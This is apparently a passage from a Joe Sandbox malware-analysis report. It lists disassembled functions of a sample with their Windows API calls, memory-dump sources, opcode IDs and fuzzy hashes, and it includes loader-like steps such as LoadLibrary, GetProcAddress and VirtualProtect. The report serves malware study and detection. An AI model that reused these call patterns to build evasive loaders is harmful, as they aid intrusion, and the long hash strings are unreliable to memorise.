                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                        • String ID: SCRIPT
                                                                                                                                                        • API String ID: 3051347437-3967369404
                                                                                                                                                        • Opcode ID: 58f44f36edfd801804ddf2056b622bf6acecf01b4bcdc028de32d080cfb8115b
                                                                                                                                                        • Instruction ID: 6733fb2e195bf38a9c82318bede612435f4f724ffe5bde083afb078b3e0b9945
                                                                                                                                                        • Opcode Fuzzy Hash: 58f44f36edfd801804ddf2056b622bf6acecf01b4bcdc028de32d080cfb8115b
                                                                                                                                                        • Instruction Fuzzy Hash: 02115A71200701BFEB258B65EC48FA77BFAEBC9B41F208068B41287190DA71DD00CA61
                                                                                                                                                        Function 00AD6F5B Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00AD6F7D
                                                                                                                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00AD6F8D
                                                                                                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 00AD6FAC
                                                                                                                                                        • __wsplitpath.LIBCMT ref: 00AD6FD0
                                                                                                                                                        • _wcscat.LIBCMT ref: 00AD6FE3
                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00AD7022
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1605983538-0
                                                                                                                                                        • Opcode ID: f002f50df738d5f94eea1be0117e97aacc75ba24d281825468d6c1346c340922
                                                                                                                                                        • Instruction ID: cf0f35cd6866d3fd80ef025bc0ec7380847a4d5d595a5ce65c88d0c399022193
                                                                                                                                                        • Opcode Fuzzy Hash: f002f50df738d5f94eea1be0117e97aacc75ba24d281825468d6c1346c340922
                                                                                                                                                        • Instruction Fuzzy Hash: D0218771904218ABDB11ABA0CD89BEEB7BCAB48300F5004EAF505E3241EB759F84DB60
                                                                                                                                                        Function 00C3C140 Relevance: 7.7, APIs: 5, Instructions: 206librarymemoryloaderCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryA.KERNEL32(?), ref: 00C3C27A
                                                                                                                                                        • GetProcAddress.KERNEL32(?,00C35FF9), ref: 00C3C298
                                                                                                                                                        • ExitProcess.KERNEL32(?,00C35FF9), ref: 00C3C2A9
                                                                                                                                                        • VirtualProtect.KERNEL32(00A90000,00001000,00000004,?,00000000), ref: 00C3C2F7
                                                                                                                                                        • VirtualProtect.KERNEL32(00A90000,00001000), ref: 00C3C30C
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1996367037-0
                                                                                                                                                        • Opcode ID: 9a06c70c20eb8b1eed98c70ced02ca25bf92ab7541c679f8d7dba39d6a480d8d
                                                                                                                                                        • Instruction ID: d1bef3a83781017fa6ca7782e53057d80d419a2149e1669ec4a5a8446651cd3a
                                                                                                                                                        • Opcode Fuzzy Hash: 9a06c70c20eb8b1eed98c70ced02ca25bf92ab7541c679f8d7dba39d6a480d8d
                                                                                                                                                        • Instruction Fuzzy Hash: 3A512972A753524BD7209AB8CCC066DB7A0EB51320F280738D9F6E73C7E7A0590697A4
                                                                                                                                                        Function 00ADEFCD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AD78AD: GetFullPathNameW.KERNEL32(?,00000105,?,?), ref: 00AD78CB
                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00ADF04D
                                                                                                                                                        • CoCreateInstance.COMBASE(00B1DA7C,00000000,00000001,00B1D8EC,?), ref: 00ADF066
                                                                                                                                                        • CoUninitialize.COMBASE ref: 00ADF083
                                                                                                                                                          • Part of subcall function 00A984A6: __swprintf.LIBCMT ref: 00A984E5
                                                                                                                                                          • Part of subcall function 00A984A6: __itow.LIBCMT ref: 00A98519
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                                                                                        • String ID: .lnk
                                                                                                                                                        • API String ID: 2126378814-24824748
                                                                                                                                                        • Opcode ID: 58224322a39dd2514a3454025d3670530e1f18331e7396385203478c041ef9a0
                                                                                                                                                        • Instruction ID: cff92b7e7b78ece1b9b8cc0ef5a103a31ba70cc86fc3eab3569b965a70bf4a5c
                                                                                                                                                        • Opcode Fuzzy Hash: 58224322a39dd2514a3454025d3670530e1f18331e7396385203478c041ef9a0
                                                                                                                                                        • Instruction Fuzzy Hash: 26A15575604301AFCB10DF14C984E5ABBE5FF89320F148999F99A9B3A2CB31ED45CB91
                                                                                                                                                        Function 00AADD92 Relevance: 4.5, APIs: 3, Instructions: 26fileCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetFileAttributesW.KERNEL32(00A9C848,00A9C848), ref: 00AADDA2
                                                                                                                                                        • FindFirstFileW.KERNEL32(00A9C848,?), ref: 00B04A83
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: File$AttributesFindFirst
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4185537391-0
                                                                                                                                                        • Opcode ID: 4f445e3f1b6d2bdaebb4b1b8a813ee8a094110514edd75159fe9936bad18e66c
                                                                                                                                                        • Instruction ID: 662331164f805bbd1105fe2ee3664e180e0d4b53ed9f32450571f33eefb76f39
                                                                                                                                                        • Opcode Fuzzy Hash: 4f445e3f1b6d2bdaebb4b1b8a813ee8a094110514edd75159fe9936bad18e66c
                                                                                                                                                        • Instruction Fuzzy Hash: 59E0DF72815411BB93146738EC0D8EA3BAC9E06338B604759F976D30E0EF70AD6486DA
                                                                                                                                                        Function 00A9DCD0 Relevance: 3.5, APIs: 2, Instructions: 540COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 117ff85192921730571cb4b5d6f3d1ae700751291226a0916f20873184310b84
                                                                                                                                                        • Instruction ID: c64d428ce48ed47206e06e8a6c8d5ea6dce93f9f0dcffc3c2790c23851f5082b
                                                                                                                                                        • Opcode Fuzzy Hash: 117ff85192921730571cb4b5d6f3d1ae700751291226a0916f20873184310b84
                                                                                                                                                        • Instruction Fuzzy Hash: 6622AE74A00216DFDF24DF58C491BAABBF0FF19300F148169E8969B392E771AD85CB91
                                                                                                                                                        Function 00AA3680 Relevance: 2.5, APIs: 1, Instructions: 986COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: BuffCharUpper
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3964851224-0
                                                                                                                                                        • Opcode ID: 94195cbd152b1671b0c3afe281e7b826caa0942eb60a893485b8b6ab5693f1e7
                                                                                                                                                        • Instruction ID: 46bbf7de41bbf9e45cb3ce4ee2732e3c9760783d3b37c43abf4a04d7cb31f994
                                                                                                                                                        • Opcode Fuzzy Hash: 94195cbd152b1671b0c3afe281e7b826caa0942eb60a893485b8b6ab5693f1e7
                                                                                                                                                        • Instruction Fuzzy Hash: 6A9266716083419FDB24DF18C580B6ABBF0BF89304F14899DF98A8B2A2D775ED45CB52
                                                                                                                                                        Function 00B0C146 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: NameUser
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2645101109-0
                                                                                                                                                        • Opcode ID: de944a3e5822349278b5774770516685b48fc306a4e1979021cc9327fa4c4fa2
                                                                                                                                                        • Instruction ID: 87dfa2463cdca0e7c2ec34415b72bb7120d73d1e56b962faad02162a9b664262
                                                                                                                                                        • Opcode Fuzzy Hash: de944a3e5822349278b5774770516685b48fc306a4e1979021cc9327fa4c4fa2
                                                                                                                                                        • Instruction Fuzzy Hash: 15C04CB140400DDFC715CB80C989DEFB7BCBB08300F104095A115E2040DB709B459B71
                                                                                                                                                        Function 00A9E1F0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 815windowsleeptimeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A9E279
                                                                                                                                                        • timeGetTime.WINMM ref: 00A9E51A
                                                                                                                                                        • TranslateMessage.USER32(?), ref: 00A9E646
                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 00A9E651
                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A9E664
                                                                                                                                                        • LockWindowUpdate.USER32(00000000), ref: 00A9E697
                                                                                                                                                        • DestroyWindow.USER32 ref: 00A9E6A3
                                                                                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A9E6BD
                                                                                                                                                        • Sleep.KERNEL32(0000000A), ref: 00B05B15
                                                                                                                                                        • TranslateMessage.USER32(?), ref: 00B062AF
                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 00B062BD
                                                                                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B062D1
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                                                                                                        • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                                                                                        • API String ID: 2641332412-570651680
                                                                                                                                                        • Opcode ID: 8d22d9b7d36d5a98ca0da5fc54e86b2337f81c0aea3f595bcb61adf750e97cb8
                                                                                                                                                        • Instruction ID: 3e2573f2b4d2309f53245c114765ee2843a2ed07c4c694aa46ef8fb1eaa602ac
                                                                                                                                                        • Opcode Fuzzy Hash: 8d22d9b7d36d5a98ca0da5fc54e86b2337f81c0aea3f595bcb61adf750e97cb8
                                                                                                                                                        • Instruction Fuzzy Hash: A362A070604341DFDB24DF24C985BAA7BE4BF45304F1449ADF94A8B2D2DB75E888CB62
                                                                                                                                                        Function 00AC6A28 Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 626fileCOMMONLIBRARYCODE
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • ___createFile.LIBCMT ref: 00AC6C73
                                                                                                                                                        • ___createFile.LIBCMT ref: 00AC6CB4
                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00AC6CDD
                                                                                                                                                        • __dosmaperr.LIBCMT ref: 00AC6CE4
                                                                                                                                                        • GetFileType.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00AC6CF7
                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00AC6D1A
                                                                                                                                                        • __dosmaperr.LIBCMT ref: 00AC6D23
                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00AC6D2C
                                                                                                                                                        • __set_osfhnd.LIBCMT ref: 00AC6D5C
                                                                                                                                                        • __lseeki64_nolock.LIBCMT ref: 00AC6DC6
                                                                                                                                                        • __close_nolock.LIBCMT ref: 00AC6DEC
                                                                                                                                                        • __chsize_nolock.LIBCMT ref: 00AC6E1C
                                                                                                                                                        • __lseeki64_nolock.LIBCMT ref: 00AC6E2E
                                                                                                                                                        • __lseeki64_nolock.LIBCMT ref: 00AC6F26
                                                                                                                                                        • __lseeki64_nolock.LIBCMT ref: 00AC6F3B
                                                                                                                                                        • __close_nolock.LIBCMT ref: 00AC6F9B
                                                                                                                                                          • Part of subcall function 00ABF84C: CloseHandle.KERNEL32(00000000,00B3EEC4,00000000,?,00AC6DF1,00B3EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00ABF89C
                                                                                                                                                          • Part of subcall function 00ABF84C: GetLastError.KERNEL32(?,00AC6DF1,00B3EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00ABF8A6
                                                                                                                                                          • Part of subcall function 00ABF84C: __free_osfhnd.LIBCMT ref: 00ABF8B3
                                                                                                                                                          • Part of subcall function 00ABF84C: __dosmaperr.LIBCMT ref: 00ABF8D5
                                                                                                                                                          • Part of subcall function 00AB889E: __getptd_noexit.LIBCMT ref: 00AB889E
                                                                                                                                                        • __lseeki64_nolock.LIBCMT ref: 00AC6FBD
                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00AC70F2
                                                                                                                                                        • ___createFile.LIBCMT ref: 00AC7111
                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00AC711E
                                                                                                                                                        • __dosmaperr.LIBCMT ref: 00AC7125
                                                                                                                                                        • __free_osfhnd.LIBCMT ref: 00AC7145
                                                                                                                                                        • __invoke_watson.LIBCMT ref: 00AC7173
                                                                                                                                                        • __wsopen_helper.LIBCMT ref: 00AC718D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                                                                                                        • String ID: @
                                                                                                                                                        • API String ID: 3896587723-2766056989
                                                                                                                                                        • Opcode ID: b6b76077fa331afb9940905771e64ca5d77c08ecd05c9d13d592ed3bf95ba0b4
                                                                                                                                                        • Instruction ID: 37441f6666b841b2cada77032096c7c0ce0341c42b102c9a12712f056e3da0b5
                                                                                                                                                        • Opcode Fuzzy Hash: b6b76077fa331afb9940905771e64ca5d77c08ecd05c9d13d592ed3bf95ba0b4
                                                                                                                                                        • Instruction Fuzzy Hash: 082203719042059BEB25DF68DC51FED7B75EF04320F2A426DE921AB2E2C7398D50CB51
                                                                                                                                                        Function 00AD76DB Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 178COMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                        • GetFileVersionInfoSizeW.KERNELBASE(?,?), ref: 00AD76ED
                                                                                                                                                        • GetFileVersionInfoW.KERNELBASE(?,00000000,00000000,00000000,?,?), ref: 00AD7713
                                                                                                                                                        • _wcscpy.LIBCMT ref: 00AD7741
                                                                                                                                                        • _wcscmp.LIBCMT ref: 00AD774C
                                                                                                                                                        • _wcscat.LIBCMT ref: 00AD7762
                                                                                                                                                        • _wcsstr.LIBCMT ref: 00AD776D
